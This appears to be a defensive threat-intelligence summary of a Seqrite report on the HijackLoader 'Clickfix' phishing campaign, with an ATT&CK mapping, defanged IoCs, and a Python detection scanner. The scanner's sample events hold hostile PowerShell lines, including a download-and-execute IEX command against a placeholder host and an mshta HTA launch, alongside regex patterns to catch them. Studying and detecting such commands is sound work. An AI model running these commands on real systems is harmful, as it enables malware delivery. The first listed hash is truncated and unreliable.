Full Report
Source post: "Deconstructing a Cyber Deception: An Analysis of the Clickfix HijackLoader Phishing Campaign", Blogs on Information Technology, Network & Cybersecurity | Seqrite.
Table of Contents: Introduction; The Evolving Threat of Attack Loaders; Objective of This Blog; Technical Methodology and Analysis; Initial Access and Social Engineering; Multi-Stage Obfuscation and De-obfuscation; Anti-Analysis Techniques; The Final Payload; Conclusion; IOCs; Quick Heal \ Seqrite Protection; MITRE ATT&CK Mapping.
Introduction (excerpt): With the evolution of cyber threats, the final execution of a […]
Analysis Summary
# Tool/Technique: HijackLoader
## Overview
HijackLoader is an attack loader that functions as a Malware-as-a-Service (MaaS) tool, designed to circumvent security defenses, establish persistence, and covertly deliver sophisticated, final-stage malware payloads (such as stealers and RATs) within compromised environments. It gained prominence in the latter half of 2023.
## Technical Details
- Type: Malware (Loader)
- Platform: Windows (Implied by use of PowerShell, HTA, Registry, and WOW64 syscalls)
- Capabilities: Initial access facilitation, multi-stage obfuscation/de-obfuscation, advanced evasion techniques (e.g., process doppelgänging, DLL unhooking, direct syscalls), persistence establishment, and deployment of secondary payloads like DeerStealer.
- First Seen: Second half of 2023
## MITRE ATT&CK Mapping
- [TA0001 - Initial Access]
  - [T1566.002 - Phishing: Spearphishing Link] (Via Clickfix CAPTCHA campaign)
  - [T1189 - Drive-by Compromise] (Via fake installers, malvertising, SEO-poisoned sites)
- [TA0002 - Execution]
  - [T1059.001 - Command and Scripting Interpreter: PowerShell]
- [TA0005 - Defense Evasion]
  - [T1027 - Obfuscated Files or Information]
  - [T1140 - Deobfuscate/Decode Files or Information]
  - [T1562.001 - Impair Defenses: Disable or Modify Tools] (Unhooking DLLs)
  - [T1211 - Exploitation for Defense Evasion] (Direct syscalls under WOW64)
  - [T1036 - Masquerading] (.mp3 extension used for PowerShell scripts)
- [TA0007 - Discovery]
  - [T1082 - System Information Discovery] (Anti-VM checks)
  - [T1497.001 - Virtualization/Sandbox Evasion: System Checks] (Checks VirtualBox identifiers)
- [TA0003 - Persistence]
  - [T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys]
- [TA0008 - Privilege Escalation]
  - [T1055 - Process Injection] (PE injection routines mentioned)
- [TA0011 - Command and Control]
  - [T1071.001 - Application Layer Protocol: Web Protocols]
- [TA0009 - Collection]
  - [T1056 - Input Capture]
  - [T1005 - Data from Local System] (Via final stealer payload)
## Functionality
### Core Capabilities
- Delivering secondary payloads (Stealers, RATs).
- Multi-stage infection chain utilizing HTA droppers and heavily obfuscated PowerShell scripts.
- Initial distribution via deceptive means like CAPTCHA phishing (dubbed "Clickfix" in this campaign), fake installers, malvertising, and compromised web portals.
- Utilizing complex string reconstruction via mathematical operations to evade static analysis.
### Advanced Features
- Advanced evasion techniques:
  - Process doppelgänging using transacted sections.
  - Unhooking of system DLLs.
  - Execution via direct syscalls specifically tailored for the WOW64 environment.
  - Sophisticated call-stack spoofing.
- Robust anti-virtual machine/sandbox checks (including inspection of running processes and specific VirtualBox identifiers).
## Indicators of Compromise
- File Hashes:
  - `fa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82`
  - `52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd`
  - `c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e`
  - `D0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4`
  - `50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee`
- File Names: `samie_bower.mp3` (used for a PowerShell script)
- Registry Keys: Registry key modification observed for persistence (T1547.001).
- Network Indicators:
  - `hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3` (C2 download URL)
  - `hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta`
  - `hxxp[:]//77[.]91[.]101[.]66/`
  - `91[.]212[.]166[.]51` (IP address)
  - `37[.]27[.]165[.]65:1477` (IP:Port)
  - `cosi[.]com[.]ar` (Domain used for C2/download)
- Behavioral Indicators: Execution chain starting with CAPTCHA page -> HTA dropper -> PowerShell execution -> downloading remote scripts -> Anti-VM assessment.
## Associated Threat Actors
- Financially motivated threat actors (using HijackLoader as MaaS).
- TAG-150 (Observed leveraging HijackLoader alongside CastleLoader/CastleBot).
## Detection Methods
- Signature-based detection: Identified by Seqrite protection as `Script.Trojan.49900.GC`, `Loader.StealerDropperCiR`, `Trojan.InfoStealerCiR`, `Trojan.Agent`, and `BDS/511`.
- Behavioral detection: Monitoring for heavily obfuscated PowerShell execution, dynamic string construction, DLL unhooking attempts, and system information queries targeting virtualization artifacts (like VirtualBox identifiers).
- YARA rules: None provided in the source report; rules keyed to the specific obfuscation patterns would be needed for static detection of them.
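The behavioral detection points above (remote HTA launch, a script masquerading behind a `.mp3` extension, arithmetic `[char]` string reconstruction, VirtualBox identifier checks) can be turned into a small log-scanning check. This is an added example, not code from the Seqrite report; the event texts are constructed, the hosts are placeholders, and only the `3g2bzgrevl.hta` and `samie_bower.mp3` file names are taken from the report's IoC list.

```python
import re

# Constructed sample command lines / script-block text (e.g. PowerShell event ID 4104
# or Sysmon event ID 1). The .hta and .mp3 file names come from the report's IoC list;
# the hosts and surrounding commands are invented for illustration.
SAMPLE_EVENTS = {
    "evt-0": "mshta https://example.invalid/3g2bzgrevl.hta",
    "evt-1": "$u='https://example.invalid/samie_bower.mp3'; IEX (New-Object Net.WebClient).DownloadString($u)",
    "evt-2": "$s=-join([char](0x48+0),[char](0x60+5),[char](0x6C+0)); Invoke-Expression $s",
    "evt-3": "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'VirtualBox' -or (Get-Process VBoxService -EA 0)) { exit }",
    "evt-4": "Get-ChildItem C:\\Users\\Public | Select-Object Name",
}

RULES = [
    # HTA dropper fetched straight from a URL (CAPTCHA page -> HTA stage of the chain).
    ("remote_hta_launch",
     re.compile(r"\bmshta(\.exe)?\b.*https?://\S+\.hta\b", re.I)),
    # Masquerading (T1036): payload behind a media extension handed to IEX / Invoke-Expression.
    ("masquerade_media_ext",
     re.compile(r"https?://\S+\.(mp3|mp4|jpg|png|gif)\b.*\b(iex|invoke-expression)\b", re.I)),
    # Dynamic string reconstruction (T1027/T1140): three or more [char](<arithmetic>) casts in a row.
    ("arith_char_reconstruction",
     re.compile(r"(\[char\]\s*\(\s*0x[0-9a-f]+\s*[+\-*]\s*\d+\s*\)[\s,]*){3,}", re.I)),
    # Anti-VM assessment (T1497.001): VirtualBox identifiers probed via WMI or process listing.
    ("virtualbox_check",
     re.compile(r"VirtualBox|VBoxService|\bVBOX\b", re.I)),
]

def scan_event(text: str) -> list[str]:
    """Return the names of all rules matching one event's command line or script text."""
    return [name for name, rx in RULES if rx.search(text)]

def scan_all(events: dict[str, str]) -> dict[str, list[str]]:
    """Map event id -> matched rule names, keeping only events with at least one hit."""
    hits = {}
    for evt_id, text in events.items():
        matched = scan_event(text)
        if matched:
            hits[evt_id] = matched
    return hits

if __name__ == "__main__":
    for evt_id, names in scan_all(SAMPLE_EVENTS).items():
        print(f"{evt_id}: {', '.join(names)}")
```

Each rule maps to one stage of the observed chain, so a single host raising several of them in sequence is a stronger signal than any one match on its own.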
## Mitigation Strategies
- Implement robust email and web filtering to block access to sites hosting fake installers or delivering CAPTCHA lures.
- Employ Endpoint Detection and Response (EDR) solutions capable of monitoring for dynamic analysis evasion techniques (e.g., direct syscalls, DLL unhooking).
- Maintain strict application control policies to restrict execution from unusual file types (like HTA or scripts masquerading with `.mp3` extensions).
- Harden systems against registry modifications intended for persistence (T1547.001).
## Related Tools/Techniques
- **Final Payload:** DeerStealer (observed being downloaded).
- **Co-used Loader:** CastleLoader/CastleBot.
- **Initial Vector Theme:** Clickfix (The name given to the specific CAPTCHA phishing technique observed).